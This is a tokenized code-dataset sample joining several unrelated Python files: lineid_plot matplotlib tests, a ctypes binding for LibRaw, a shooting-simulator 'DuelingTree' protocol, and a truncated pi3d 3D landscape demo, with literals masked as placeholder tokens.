<NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , extend = False ) <EOL> def test_multi_plot_user_axes ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_axes ( [ <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> ax . plot ( wave , flux ) <EOL> lineid_plot . 
plot_line_ids ( wave , flux , line_wave , line_label1 , ax = ax ) <EOL> ax1 = fig . add_axes ( [ <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> ax1 . plot ( wave , flux ) <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , ax = ax1 ) <EOL> def test_annotate_kwargs_and_plot_kwargs ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ak = lineid_plot . initial_annotate_kwargs ( ) <EOL> ak [ '<STR_LIT>' ] [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> pk = lineid_plot . initial_plot_kwargs ( ) <EOL> pk [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , annotate_kwargs = ak , plot_kwargs = pk ) <EOL> def test_customize_box_and_line ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig , ax = lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 ) <EOL> b = ax . findobj ( match = lambda x : x . get_label ( ) == '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> b . set_rotation ( <NUM_LIT:0> ) <EOL> b . set_text ( "<STR_LIT>" ) <EOL> line = ax . findobj ( match = lambda x : x . get_label ( ) == '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> line . set_color ( "<STR_LIT>" ) <EOL> line . set_linestyle ( "<STR_LIT:->" ) <EOL> def test_small_change_to_y_loc_of_label ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . 
normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , <EOL> box_axes_space = <NUM_LIT> ) <EOL> def test_custom_y_loc_for_annotation_point ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . plot ( wave , flux ) <EOL> ax . axis ( [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , arrow_tip = <NUM_LIT> , ax = ax ) <EOL> def test_custom_y_loc_for_annotation_point_each_label_sep_loc ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . plot ( wave , flux ) <EOL> ax . axis ( [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> arrow_tips = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , arrow_tip = arrow_tips , ax = ax ) <EOL> def test_custom_y_loc_for_label_boxes ( ) : <EOL> wave = <NUM_LIT> + np . 
arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . plot ( wave , flux ) <EOL> ax . axis ( [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , arrow_tip = <NUM_LIT> , ax = ax , box_loc = <NUM_LIT> ) <EOL> def test_custom_y_loc_for_label_boxes_each_box_sep_loc ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . plot ( wave , flux ) <EOL> ax . axis ( [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> arrow_tips = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> box_loc = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , <EOL> arrow_tip = arrow_tips , box_loc = box_loc , ax = ax ) <EOL> def test_access_a_specific_label ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . 
figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . plot ( wave , flux ) <EOL> ax . axis ( [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> arrow_tips = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> box_loc = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , <EOL> arrow_tip = arrow_tips , box_loc = box_loc , ax = ax ) <EOL> a = ax . findobj ( mpl . text . Annotation ) <EOL> for i in a : <EOL> if i . get_label ( ) == "<STR_LIT>" : <EOL> i . set_visible ( False ) <EOL> a = ax . findobj ( mpl . lines . Line2D ) <EOL> for i in a : <EOL> if i . get_label ( ) == "<STR_LIT>" : <EOL> i . set_visible ( False ) <EOL> def test_max_iter_small ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , max_iter = <NUM_LIT:10> ) <EOL> def test_max_iter_large ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , max_iter = <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from ctypes import * <EOL> from ctypes import util <EOL> from libraw import errors <EOL> from libraw . callbacks import data_callback <EOL> from libraw . callbacks import memory_callback <EOL> from libraw . callbacks import progress_callback <EOL> from libraw . errors import c_error <EOL> from libraw import structs_16 <EOL> from libraw import structs_17 <EOL> class LibRaw ( CDLL ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> libraw = util . find_library ( '<STR_LIT>' ) <EOL> try : <EOL> if libraw is not None : <EOL> super ( LibRaw , self ) . __init__ ( libraw ) <EOL> else : <EOL> raise ImportError <EOL> except ( ImportError , AttributeError , OSError , IOError ) : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> try : <EOL> structs = { <EOL> <NUM_LIT:16> : structs_16 , <EOL> <NUM_LIT> : structs_17 , <EOL> } [ self . version_number [ <NUM_LIT:1> ] ] <EOL> except KeyError : <EOL> raise ImportError ( <EOL> '<STR_LIT>' % self . version_number <EOL> ) <EOL> libraw_data_t = structs . libraw_data_t <EOL> libraw_decoder_info_t = structs . libraw_decoder_info_t <EOL> libraw_processed_image_t = structs . libraw_processed_image_t <EOL> self . libraw_init . argtypes = [ c_int ] <EOL> self . libraw_strprogress . argtypes = [ c_int ] <EOL> self . libraw_unpack_function_name . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_subtract_black . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_open_file . argtypes = [ POINTER ( libraw_data_t ) , c_char_p ] <EOL> self . libraw_open_file_ex . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_char_p , <EOL> c_int64 <EOL> ] <EOL> self . libraw_open_buffer . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_void_p , <EOL> c_int64 <EOL> ] <EOL> self . libraw_unpack . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_unpack_thumb . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_recycle_datastream . 
argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_recycle . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_close . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_set_memerror_handler . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> memory_callback , <EOL> c_void_p , <EOL> ] <EOL> self . libraw_set_dataerror_handler . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> data_callback , <EOL> c_void_p , <EOL> ] <EOL> self . libraw_set_progress_handler . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> progress_callback , <EOL> c_void_p , <EOL> ] <EOL> self . libraw_adjust_sizes_info_only . argtypes = [ <EOL> POINTER ( libraw_data_t ) <EOL> ] <EOL> self . libraw_dcraw_ppm_tiff_writer . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_char_p <EOL> ] <EOL> self . libraw_dcraw_thumb_writer . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_char_p <EOL> ] <EOL> self . libraw_dcraw_process . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_dcraw_make_mem_image . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> POINTER ( c_int ) <EOL> ] <EOL> self . libraw_dcraw_make_mem_thumb . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> POINTER ( c_int ) <EOL> ] <EOL> self . libraw_dcraw_clear_mem . argtypes = [ <EOL> POINTER ( libraw_processed_image_t ) <EOL> ] <EOL> self . libraw_raw2image . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_free_image . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_get_decoder_info . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> POINTER ( libraw_decoder_info_t ) <EOL> ] <EOL> self . libraw_COLOR . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_int , <EOL> c_int <EOL> ] <EOL> self . libraw_init . restype = POINTER ( libraw_data_t ) <EOL> self . libraw_version . restype = c_char_p <EOL> self . libraw_strprogress . restype = c_char_p <EOL> self . libraw_versionNumber . restype = c_int <EOL> self . libraw_cameraCount . 
restype = c_int <EOL> self . libraw_cameraList . restype = POINTER ( <EOL> c_char_p * self . libraw_cameraCount ( ) <EOL> ) <EOL> self . libraw_unpack_function_name . restype = c_char_p <EOL> self . libraw_subtract_black . restype = POINTER ( libraw_data_t ) <EOL> self . libraw_open_file . restype = c_error <EOL> self . libraw_open_file_ex . restype = c_error <EOL> self . libraw_open_buffer . restype = c_error <EOL> self . libraw_unpack . restype = c_error <EOL> self . libraw_unpack_thumb . restype = c_error <EOL> self . libraw_adjust_sizes_info_only . restype = c_error <EOL> self . libraw_dcraw_ppm_tiff_writer . restype = c_error <EOL> self . libraw_dcraw_thumb_writer . restype = c_error <EOL> self . libraw_dcraw_process . restype = c_error <EOL> self . libraw_dcraw_make_mem_image . restype = POINTER ( <EOL> libraw_processed_image_t ) <EOL> self . libraw_dcraw_make_mem_thumb . restype = POINTER ( <EOL> libraw_processed_image_t ) <EOL> self . libraw_raw2image . restype = c_error <EOL> self . libraw_get_decoder_info . restype = c_error <EOL> self . libraw_COLOR . restype = c_int <EOL> try : <EOL> self . libraw_open_wfile . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_wchar_p <EOL> ] <EOL> self . libraw_open_wfile_ex . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_wchar_p , <EOL> c_int64 <EOL> ] <EOL> self . libraw_open_wfile . restype = c_error <EOL> self . libraw_open_wfile_ex . restype = c_error <EOL> except AttributeError : <EOL> pass <EOL> @ property <EOL> def version_number ( self ) : <EOL> """<STR_LIT>""" <EOL> v = self . libraw_versionNumber ( ) <EOL> return ( ( v >> <NUM_LIT:16> ) & <NUM_LIT> , ( v >> <NUM_LIT:8> ) & <NUM_LIT> , v & <NUM_LIT> ) <EOL> @ property <EOL> def version ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . libraw_version ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> def __getitem__ ( self , name ) : <EOL> func = super ( LibRaw , self ) . __getitem__ ( name ) <EOL> func . errcheck = errors . 
check_call <EOL> return func </s>
<s> import threading <EOL> from training_protocols . ITrainingProtocol import ITrainingProtocol <EOL> class DuelingTree ( ITrainingProtocol ) : <EOL> def __init__ ( self , main_window , protocol_operations , targets ) : <EOL> self . _operations = protocol_operations <EOL> self . _operations . reset ( ) <EOL> self . _continue_protocol = True <EOL> self . _protocol_is_resetting = False <EOL> self . _left_score = <NUM_LIT:0> <EOL> self . _right_score = <NUM_LIT:0> <EOL> self . _targets_on_left = [ ] <EOL> self . _targets_on_right = [ ] <EOL> self . _wait_event = threading . Event ( ) <EOL> if self . _find_targets ( targets ) : <EOL> self . _operations . add_shot_list_columns ( ( "<STR_LIT>" , ) , [ <NUM_LIT> ] ) <EOL> def _find_targets ( self , targets ) : <EOL> found_target = False <EOL> for target in targets : <EOL> if found_target : <EOL> break <EOL> for region in target [ "<STR_LIT>" ] : <EOL> if "<STR_LIT>" in region : <EOL> if region [ "<STR_LIT>" ] . startswith ( "<STR_LIT>" ) : <EOL> self . _targets_on_left . append ( region [ "<STR_LIT>" ] ) <EOL> found_target = True <EOL> elif region [ "<STR_LIT>" ] . startswith ( "<STR_LIT>" ) : <EOL> self . _targets_on_right . append ( region [ "<STR_LIT>" ] ) <EOL> found_target = True <EOL> if not found_target : <EOL> self . _operations . say ( "<STR_LIT>" ) <EOL> else : <EOL> self . _operations . show_text_on_feed ( "<STR_LIT>" ) <EOL> return found_target <EOL> def shot_listener ( self , shot , shot_list_item , is_hit ) : <EOL> return <EOL> def hit_listener ( self , region , tags , shot , shot_list_item ) : <EOL> if "<STR_LIT>" in tags : <EOL> if ( tags [ "<STR_LIT>" ] . startswith ( "<STR_LIT>" ) or tags [ "<STR_LIT>" ] . startswith ( "<STR_LIT>" ) ) : <EOL> if tags [ "<STR_LIT>" ] in self . _targets_on_left : <EOL> self . _targets_on_left . remove ( tags [ "<STR_LIT>" ] ) <EOL> self . _targets_on_right . append ( tags [ "<STR_LIT>" ] ) <EOL> hit_by = "<STR_LIT:left>" <EOL> elif tags [ "<STR_LIT>" ] in self . 
_targets_on_right : <EOL> self . _targets_on_left . append ( tags [ "<STR_LIT>" ] ) <EOL> self . _targets_on_right . remove ( tags [ "<STR_LIT>" ] ) <EOL> hit_by = "<STR_LIT:right>" <EOL> self . _operations . append_shot_item_values ( shot_list_item , <EOL> ( hit_by , ) ) <EOL> if ( len ( self . _targets_on_right ) == <NUM_LIT:6> ) : <EOL> self . _left_score += <NUM_LIT:1> <EOL> self . _round_over ( ) <EOL> if ( len ( self . _targets_on_left ) == <NUM_LIT:6> ) : <EOL> self . _right_score += <NUM_LIT:1> <EOL> self . _round_over ( ) <EOL> def _round_over ( self ) : <EOL> message = "<STR_LIT>" % ( self . _left_score , <EOL> self . _right_score ) <EOL> self . _operations . show_text_on_feed ( message ) <EOL> if self . _continue_protocol : <EOL> self . _operations . pause_shot_detection ( True ) <EOL> self . _new_round_thread = Thread ( target = self . _new_round , <EOL> name = "<STR_LIT>" ) <EOL> self . _new_round_thread . start ( ) <EOL> def _new_round ( self ) : <EOL> self . _wait_event . wait ( <NUM_LIT:5> ) <EOL> self . _protocol_is_resetting = True <EOL> self . _operations . reset ( ) <EOL> self . _protocol_is_resetting = False <EOL> self . _operations . pause_shot_detection ( False ) <EOL> message = "<STR_LIT>" % ( self . _left_score , <EOL> self . _right_score ) <EOL> self . _operations . show_text_on_feed ( message ) <EOL> def reset ( self , targets ) : <EOL> if not self . _protocol_is_resetting : <EOL> self . _left_score = <NUM_LIT:0> <EOL> self . _right_score = <NUM_LIT:0> <EOL> self . _operations . show_text_on_feed ( "<STR_LIT>" ) <EOL> self . _protocol_is_resetting = False <EOL> self . _targets_on_left = [ ] <EOL> self . _targets_on_right = [ ] <EOL> self . _find_targets ( targets ) <EOL> def destroy ( self ) : <EOL> self . _continue_protocol = False <EOL> self . _wait_event . 
set ( ) <EOL> pass <EOL> def get_info ( ) : <EOL> protocol_info = { } <EOL> protocol_info [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> protocol_info [ "<STR_LIT:version>" ] = "<STR_LIT:1.0>" <EOL> protocol_info [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> desc = "<STR_LIT>" <EOL> desc += "<STR_LIT>" <EOL> desc += "<STR_LIT>" <EOL> desc += "<STR_LIT>" <EOL> protocol_info [ "<STR_LIT:description>" ] = desc <EOL> return protocol_info <EOL> def load ( main_window , protocol_operations , targets ) : <EOL> return DuelingTree ( main_window , protocol_operations , targets ) </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> """<STR_LIT>""" <EOL> import math , random , time <EOL> import demo <EOL> import pi3d <EOL> LOGGER = pi3d . Log . logger ( __name__ ) <EOL> LOGGER . info ( "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" ) <EOL> DISPLAY = pi3d . Display . create ( w = <NUM_LIT> , h = <NUM_LIT> ) <EOL> DISPLAY . set_background ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> pi3d . Light ( lightpos = ( <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:3> ) , lightcol = ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ) , lightamb = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> shader = pi3d . Shader ( "<STR_LIT>" ) <EOL> flatsh = pi3d . Shader ( "<STR_LIT>" ) <EOL> tree2img = pi3d . Texture ( "<STR_LIT>" ) <EOL> tree1img = pi3d . Texture ( "<STR_LIT>" ) <EOL> hb2img = pi3d . Texture ( "<STR_LIT>" ) <EOL> bumpimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> reflimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> rockimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> FOG = ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> ) <EOL> TFOG = ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> ) , <NUM_LIT> ) <EOL> ectex = pi3d . loadECfiles ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> myecube = pi3d . EnvironmentCube ( size = <NUM_LIT> , maptype = "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> myecube . set_draw_details ( flatsh , ectex ) <EOL> mapwidth = <NUM_LIT> <EOL> mapdepth = <NUM_LIT> <EOL> mapheight = <NUM_LIT> <EOL> mountimg1 = pi3d . Texture ( "<STR_LIT>" ) <EOL> mymap = pi3d . ElevationMap ( "<STR_LIT>" , name = "<STR_LIT>" , <EOL> width = mapwidth , depth = mapdepth , height = mapheight , <EOL> divx = <NUM_LIT:32> , divy = <NUM_LIT:32> ) <EOL> mymap . set_draw_details ( shader , [ mountimg1 , bumpimg , reflimg ] , <NUM_LIT> , <NUM_LIT:0.0> ) <EOL> mymap . set_fog ( * FOG ) <EOL> treeplane = pi3d . Plane ( w = <NUM_LIT> , h = <NUM_LIT> ) <EOL> treemodel1 = pi3d . 
MergeShape ( name = "<STR_LIT>" ) <EOL> treemodel1 . add ( treeplane . buf [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> treemodel1 . add ( treeplane . buf [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> treemodel2 = pi3d . MergeShape ( name = "<STR_LIT>" ) <EOL> treemodel2 . add ( treeplane . buf [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> treemodel2 . add ( treeplane . buf [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> treemodel2 . add ( treeplane . buf [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> mytrees1 = pi3d . MergeShape ( name = "<STR_LIT>" ) <EOL> mytrees1 . cluster ( treemodel1 . buf [ <NUM_LIT:0> ] , mymap , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , "<STR_LIT>" , <NUM_LIT> , <NUM_LIT> ) <EOL> mytrees1 . set_draw_details ( flatsh , [ tree2img ] , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) <EOL> mytrees1 . set_fog ( * TFOG ) <EOL> mytrees2 = pi3d . MergeShape ( name = "<STR_LIT>" ) <EOL> mytrees2 . cluster ( treemodel2 . buf [ <NUM_LIT:0> ] , mymap , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , "<STR_LIT>" , <NUM_LIT> , <NUM_LIT> ) <EOL> mytrees2 . set_draw_details ( flatsh , [ tree1img ] , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) <EOL> mytrees2 . set_fog ( * TFOG ) <EOL> mytrees3 = pi3d . MergeShape ( name = "<STR_LIT>" ) <EOL> mytrees3 . cluster ( treemodel2 , mymap , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , "<STR_LIT>" , <NUM_LIT> , <NUM_LIT> ) <EOL> mytrees3 . set_draw_details ( flatsh , [ hb2img ] , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) <EOL> mytrees3 . set_fog ( * TFOG ) <EOL> monument = pi3d . Model ( file_string = "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> monument . set_shader ( shader ) <EOL> monument . 
set_normal_shine ( bumpimg , <NUM_LIT> , reflimg , <NUM_LIT:0.5> ) <EOL> monument . set_fog ( * FOG ) <EOL> monument . translate ( <NUM_LIT> , - mymap . calcHeight ( <NUM_LIT> , <NUM_LIT> ) + <NUM_LIT> , <NUM_LIT> ) <EOL> monument . scale ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> monument . rotateToY ( <NUM_LIT> ) <EOL> scshots = <NUM_LIT:1> <EOL> rot = <NUM_LIT:0.0> <EOL> tilt = <NUM_LIT:0.0> <EOL> avhgt = <NUM_LIT> <EOL> xm = <NUM_LIT:0.0> <EOL> zm = <NUM_LIT:0.0> <EOL> ym = mymap . calcHeight ( xm , zm ) + avhgt <EOL> mykeys = pi3d . Keyboard ( ) <EOL> CAMERA = pi3d . Camera ( scale = <NUM_LIT:0.5> ) <EOL> CAM2D = pi3d . Camera ( is_3d = False ) <EOL> font = pi3d . Font ( "<STR_LIT>" , ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) ) <EOL> filter_list = [ [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ] , <EOL> [ "<STR_LIT>" , [ - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.1> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> ] ] , <EOL> [ 